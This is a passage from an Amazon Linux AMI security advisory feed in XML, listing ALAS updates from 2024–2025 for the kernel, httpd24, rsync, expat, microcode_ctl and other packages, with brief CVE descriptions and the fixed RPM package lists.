</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39494" title="" id="CVE-2024-39494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.352" release="190.568.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.352-190.568.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.352-190.568.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.352" release="190.568.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.352-190.568.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1948</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1948: medium priority package update for amazon-ssm-agent</title><issued date="2024-09-26 00:30:00" /><updated date="2024-10-03 10:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-24790:
The various Is methods (IsPrivate, IsLoopback, etc) did not work as expected for IPv4-mapped IPv6 addresses, returning false for addresses which would return true in their traditional IPv4 forms.
CVE-2023-45288:
An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45288" title="" id="CVE-2023-45288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24790" title="" id="CVE-2024-24790" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-ssm-agent" version="3.3.859.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-3.3.859.0-1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1949</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1949: important priority package update for httpd24</title><issued date="2024-10-09 16:00:00" /><updated date="2024-10-31 14:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-9490:
Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in an HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
1866560: CVE-2020-9490 httpd: Push diary crash on specifically crafted HTTP/2 header
CVE-2020-11993:
Apache HTTP Server versions 2.4.20 to 2.4.43. When trace/debug was enabled for the HTTP/2 module and on certain traffic edge patterns, logging statements were made on the wrong connection, causing concurrent use of memory pools. Configuring the LogLevel of mod_http2 above "info" will mitigate this vulnerability for unpatched servers.
1866564: CVE-2020-11993 httpd: mod_http2 concurrent pool usage
CVE-2020-11984:
Apache HTTP server 2.4.32 to 2.4.44 mod_proxy_uwsgi info disclosure and possible RCE
1866563: CVE-2020-11984 httpd: mod_proxy_uwsgi buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984" title="" id="CVE-2020-11984" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11993" title="" id="CVE-2020-11993" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9490" title="" id="CVE-2020-9490" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-devel" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.46" release="1.90.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.46" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.46-1.90.amzn1.noarch.rpm</filename></package><package name="mod24_proxy_html" version="2.4.46" release="1.90.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.46" release="1.90.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.46" release="1.90.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.46-1.90.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1950</id><title>Amazon Linux AMI 2014.03 - 
ALAS-2024-1950: important priority package update for microcode_ctl</title><issued date="2024-10-28 17:34:00" /><updated date="2024-12-05 20:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-24980:
Protection mechanism failure in some 3rd, 4th, and 5th Generation Intel(R) Xeon(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2024-24968:
NOTE: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01097.html
NOTE: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/releases/tag/microcode-20240910
DEBIANBUG: [1081363]
CVE-2024-24853:
Incorrect behavior order in transition between executive monitor and SMI transfer monitor (STM) in some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2024-23984:
NOTE: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01103.html
NOTE: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/releases/tag/microcode-20240910
DEBIANBUG: [1081363]
CVE-2024-23918:
Improper conditions check in some Intel(R) Xeon(R) processor memory controller configurations when using Intel(R) SGX may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2024-21820:
Incorrect default permissions in some Intel(R) Xeon(R) processor memory controller configurations when using Intel(R) SGX may allow a privileged user to potentially enable escalation of privilege via local access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21820" title="" id="CVE-2024-21820" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23918" title="" id="CVE-2024-23918" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23984" title="" id="CVE-2024-23984" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24853" title="" id="CVE-2024-24853" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24968" title="" id="CVE-2024-24968" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24980" title="" id="CVE-2024-24980" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl-debuginfo" version="2.1" release="47.44.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.44.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.44.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.44.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.44.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.44.amzn1.i686.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.44.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1951</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1951: medium priority package update for kernel</title><issued date="2024-11-09 00:22:00" /><updated date="2024-11-14 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that 
fix the following vulnerabilities:
CVE-2022-3567:
A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function inet6_stream_ops/inet6_dgram_ops of the component IPv6 Handler. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. VDB-211090 is the identifier assigned to this vulnerability.
CVE-2022-3566:
A vulnerability, which was classified as problematic, was found in Linux Kernel. This affects the function tcp_getsockopt/tcp_setsockopt of the component TCP Handler. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. The identifier VDB-211089 was assigned to this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3566" title="" id="CVE-2022-3566" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3567" title="" id="CVE-2022-3567" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.350" release="188.564.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" 
version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.350-188.564.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1952</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1952: important priority package update for kernel</title><issued date="2024-12-05 20:57:00" /><updated date="2025-03-13 20:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-47280:
In the Linux kernel, the following vulnerability has been resolved:
drm: Fix use-after-free read in drm_getunique()
CVE-2021-47245:
In the Linux kernel, the following vulnerability has been resolved:
netfilter: synproxy: Fix out of bounds when parsing TCP options
CVE-2021-46992:
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nftables: avoid overflows in nft_hash_buckets()
CVE-2021-46938:
In the Linux kernel, the following vulnerability has been resolved:
dm rq: fix double free of blk_mq_tag_set in dev remove after table load fails
CVE-2021-33200:
A flaw was found in kernel/bpf/verifier.c in BPF in the Linux kernel. An incorrect limit is enforced for pointer arithmetic operations which can be abused to perform out-of-bounds reads and writes in kernel memory, leading to local privilege escalation. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-29650:
A denial-of-service (DoS) flaw was identified in the Linux kernel due to an incorrect memory barrier in xt_replace_table in net/netfilter/x_tables.c in the netfilter subsystem.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29650" title="" id="CVE-2021-29650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33200" title="" id="CVE-2021-33200" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46938" title="" id="CVE-2021-46938" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46992" title="" id="CVE-2021-46992" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47245" title="" id="CVE-2021-47245" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47280" title="" id="CVE-2021-47280" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package 
name="kernel-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package 
name="kernel-tools-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1953</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1953: important priority package update for expat</title><issued date="2025-01-06 23:07:00" /><updated date="2025-01-09 14:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-45490:
An issue was discovered in libexpat before 2.6.3. xmlparse.c does not reject a negative length for XML_ParseBuffer.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45490" title="" id="CVE-2024-45490" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat" version="2.1.0" release="15.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-15.35.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-15.35.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-15.35.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.35.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-15.35.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.35.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-15.35.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="15.35.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-15.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1955</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1955: important priority package update for rsync</title><issued date="2025-01-16 06:35:00" /><updated date="2025-01-16 18:42:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-12747:
A flaw was found in rsync. This vulnerability arises from a race condition during rsync's handling of symbolic links. Rsync's default behavior when encountering symbolic links is to skip them. If an attacker replaced a regular file with a symbolic link at the right time, it was possible to bypass the default behavior and traverse symbolic links. Depending on the privileges of the rsync process, an attacker could leak sensitive information, potentially leading to privilege escalation.
CVE-2024-12088:
A flaw was found in rsync. When using the `--safe-links` option, rsync fails to properly verify if a symbolic link destination contains another symbolic link within it. This results in a path traversal vulnerability, which may lead to arbitrary file write outside the desired directory.
CVE-2024-12087:
A path traversal vulnerability exists in rsync. It stems from behavior enabled by the `--inc-recursive` option, a default-enabled option for many client options and can be enabled by the server even if not explicitly enabled by the client. When using the `--inc-recursive` option, a lack of proper symlink verification coupled with deduplication checks occurring on a per-file-list basis could allow a server to write files outside of the client's intended destination directory. A malicious server could write malicious files to arbitrary locations named after valid directories/paths on the client.
CVE-2024-12086:
A flaw was found in rsync. It could allow a server to enumerate the contents of an arbitrary file from the client's machine. This issue occurs when files are being copied from a client to a server. During this process, the rsync server will send checksums of local data to the client to compare with in order to determine what data needs to be sent to the server. By sending specially constructed checksum values for arbitrary files, an attacker may be able to reconstruct the data of those files byte-by-byte based on the responses from the client.
CVE-2024-12085:
A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12085" title="" id="CVE-2024-12085" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12086" title="" id="CVE-2024-12086" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12087" title="" id="CVE-2024-12087" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12088" title="" id="CVE-2024-12088" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12747" title="" id="CVE-2024-12747" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rsync-debuginfo" version="3.0.6" release="12.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsync-debuginfo-3.0.6-12.17.amzn1.x86_64.rpm</filename></package><package name="rsync" version="3.0.6" release="12.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsync-3.0.6-12.17.amzn1.x86_64.rpm</filename></package><package name="rsync" version="3.0.6" release="12.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsync-3.0.6-12.17.amzn1.i686.rpm</filename></package><package name="rsync-debuginfo" version="3.0.6" release="12.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsync-debuginfo-3.0.6-12.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1956</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1956: important priority package update for rust</title><issued date="2025-01-22 02:08:00" /><updated date="2025-01-24 11:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-24577:
libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing you to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad-actor-controlled data, leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in versions 1.6.5 and 1.7.2.
